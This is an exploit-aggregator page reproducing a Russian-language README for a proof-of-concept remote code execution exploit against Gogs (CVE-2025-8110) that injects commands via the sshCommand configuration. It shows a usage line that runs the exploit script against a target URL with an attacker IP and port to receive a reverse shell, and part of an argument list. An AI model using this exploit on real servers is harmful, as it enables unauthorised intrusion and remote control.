Sploitus

Exploit for gogs

kitploit · 2026-08-27

Exploit Code

MARKDOWN19 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZABUQASEM-GOGS-CVE-2025-8110
# Gogs CVE-2025-8110 PoC

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-8110, уязвимости удаленного выполнения кода (RCE) в Gogs. Эксплойт нацелен на внутреннюю реализацию SSH-сервера, позволяя атакующим внедрять вредоносные команды через конфигурацию `sshCommand`.

## Использование

Для запуска эксплойта используйте скрипт `CVE-2025-8110.py`, указав целевой URL Gogs и ваш IP-адрес/порт для прослушивания обратной оболочки.

root@kitploit:~
    
    
    python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
    

### Аргументы

  * `-u`, `--url`: Базовый URL целевого экземпляра Gogs (например, `http://localhost:3000`).
  * `-lh`, `--host`: IP-адрес, на который должна подключиться обратная оболочка.